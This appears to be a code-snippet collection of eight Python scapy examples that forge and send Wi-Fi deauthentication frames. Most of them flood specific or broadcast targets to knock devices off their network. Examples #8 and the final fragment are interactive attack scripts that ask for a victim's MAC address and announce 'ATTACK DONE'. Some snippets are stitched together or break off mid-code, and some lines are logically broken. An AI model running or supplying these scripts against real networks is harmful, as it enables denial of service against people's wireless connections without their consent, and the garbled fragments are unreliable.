Example #1
0
    def _deauth_target(self, target, packet_count):
        # This also works with subtype 10, "Disassociation-Frame", verified
        # with MBP running 10.12.4
        ap_to_client_pckt = scapy.RadioTap() / scapy.Dot11(
            type=0,
            subtype=12,
            addr1=target,
            addr2=self._ap_bssid,
            addr3=self._ap_bssid) / scapy.Dot11Deauth(reason=1)

        actually_sent = 0
        for n in range(packet_count) or packet_count == -1:
            if not self._thread_event.isSet():
                break

            if n % 64 == 0:
                time.sleep(0.1)

            scapy.sendp(ap_to_client_pckt)

            actually_sent = n

        print "Sent " + str(actually_sent + 1) + " packets to " + target

        with self._thread_lock:
            self._threads_finished += 1
Example #2
0
def deauth(**kwargs):
    if kwargs.get("broadcast"):
        clients = ["ff:ff:ff:ff:ff:ff"]
    else:
        clients = kwargs.get("clients")
    ap = kwargs.get("ap")

    for i in range(kwargs.get("count")):
        for client in clients:
            deauth_pkt = sc.Dot11(addr1=client, addr2=ap,
                                  addr3=ap) / sc.Dot11Deauth()
            ap_deauth_pkt = sc.Dot11(addr1=ap, addr2=client,
                                     addr3=ap) / sc.Dot11Deauth()
            for j in range(kwargs.get("burst-size")):
                sc.send(deauth_pkt)
                if not kwargs.get("broadcast"):
                    sc.send(ap_deauth_pkt)
            time.sleep(kwargs.get("sleep-time"))
Example #3
0
 def deuath(self, ap: AccessPoint):
     """
     Sends deauth packets to a given access point.
     """
     pkt = (scapy.RadioTap() / scapy.Dot11(
         addr1="FF:FF:FF:FF:FF:FF", addr2=ap.bssid, addr3=ap.bssid) /
            scapy.Dot11Deauth(reason=7))
     while True:
         scapy.sendp(pkt, iface=self._interface)
Example #4
0
    def deauth(self, ssid, mac, client="FF:FF:FF:FF:FF:FF"):
        global ipiw_lock
        ipiw_lock.acquire()
        # AP -> Client
        p1 = sc.RadioTap() / sc.Dot11(
            type=0,
            subtype=12, addr1=client, addr2=mac, addr3=mac) / sc.Dot11Deauth(
                reason=5)  # reason = "AP cannot handle this many stations"
        # Client -> AP
        p2 = sc.RadioTap() / sc.Dot11(
            type=0,
            subtype=12, addr1=mac, addr2=client, addr3=mac) / sc.Dot11Deauth(
                reason=8)  # reason = "Client is leaving"

        # socket (for performance)
        s = sc.conf.L2socket(iface=self.netifmon)
        for i in range(100):
            s.send(p1)
            s.send(p2)
        s.close()
        ipiw_lock.release()
Example #5
0
 def scan(self):
     target_mac = "28:cf:e9:1e:50:2d"
     gateway_mac = "0a:00:27:00:00:0e"
     # 802.11 frame
     # addr1: destination MAC
     # addr2: source MAC
     # addr3: Access Point MAC
     dot11 = scapy.Dot11(addr1=target_mac, addr2=gateway_mac, addr3=gateway_mac)
     # stack them up
     packet = scapy.RadioTap()/dot11/scapy.Dot11Deauth()
     # send the packet
     scapy.sendp(packet, inter=0.2, count=10000, iface="Wi-Fi", verbose=1)
Example #6
0
def craft_deauth_packet(sender, receiver, bssid):
    """
    Return a deauthentication packet crafted with given information

    :param sender: The MAC address of the sender
    :param receiver: The MAC address of the receiver
    :param bssid: The MAC address of the AccessPoint
    :type sender: str
    :type receiver: str
    :type bssid: str
    :return: A deauthentication packet
    :rtype: scapy.layers.dot11.RadioTap
    """
    return (scapy.RadioTap() / scapy.Dot11(
        type=0, subtype=12, addr1=receiver, addr2=sender, addr3=bssid) /
            scapy.Dot11Deauth())
Example #7
0
def disconnect_device(router_mac: str, target_mac: str, iface: str,
                      count: int):
    """
    Force deauthenticate a device.

    Args:
        router_mac (str): Gateway MAC address.
        target_mac (str): MAC address of target device.
        iface (str): Ethernet Interface Name.
        count (int): Number of packets to be sent.
    """
    if count == 0:
        count = None
    dot11 = sc.Dot11(type=0,
                     subtype=12,
                     addr1=target_mac,
                     addr2=router_mac,
                     addr3=router_mac)
    packet = sc.RadioTap() / dot11 / sc.Dot11Deauth(reason=7)
    sc.sendp(packet, inter=0.1, count=count, iface=iface, verbose=0)
Example #8
0
#Start program
print(f"{RED}" + start)

#Show intructions
print(
    f"{YELLOW}\n[!] Before run this program set your wireless card to monitor mode \n"
)

#Get informations from router
target_mac = input(f"{CYAN}Target MAC [EX: 68-7D-6B-OE-b-41]={RESET} ")
gateway_mac = input(f"{CYAN}Gateway MAC [EX: a4-33-d7-3a-d0-37]={RESET} ")
interface = input(f"{CYAN}interface [EX: wlan0man]={RESET} ")
packets = int(input(f"{CYAN}Number os packets={RESET} "))

#Create packet
# 802.11 frame
# addr1: destination MAC
# addr2: source MAC
# addr3: Access Point MAC
dot11 = scapy.Dot11(addr1=target_mac, addr2=gateway_mac, addr3=gateway_mac)
# stack them up
packet = scapy.RadioTap() / dot11 / scapy.Dot11Deauth(reason=7)

# send the packets
p = 0
while p <= packets:
    scapy.sendp(packet, inter=0.1, count=100, iface=interface, verbose=1)
    print(f"{YELLOW}[!] Packets send " + str(p))  #show number of send packets
    p += 1

print(f"{GREEN}\n[+] ATTACK DONE !!!{RESET}")
    apNum = raw_input(
        "Pleas choose Ap from list above to see all devices on  the AP \033[1m--enter Ap number--\033[0m"
    )
    print("connect to: ", ap[int(apNum)])
    #step 3: we scan all devices on the AP
    scapy.sniff(iface="mon0", prn=sniffmgmt, timeout=20)
    #step 4 :chose Client MAC Address to attack
    macNum = raw_input(
        "Pleas choose device from list above to start Wifi deauth-attack \033[1m--enter mac number from list--\033[0m"
    )
    print("connect to: ", clients[int(macNum)])

    # Access Point MAC Address
    ap = ap[int(apNum)]

    # Client MAC Address
    client = clients[int(macNum)]

# Deauthentication Packet For Client
#             Use This Option Only If you Have Client MAC Address
pkt1 = scapy.RadioTap() / scapy.Dot11(addr1=ap, addr2=client,
                                      addr3=client) / scapy.Dot11Deauth()

t_end = time.time() + 100
while time.time() < t_end:

    scapy.sendp(pkt1, iface="mon0", inter=0.001)

raw_input(
    " '\033[1m'Finsih sucssesfuly! ThankYou Press --Enter to exit '\033[0m'")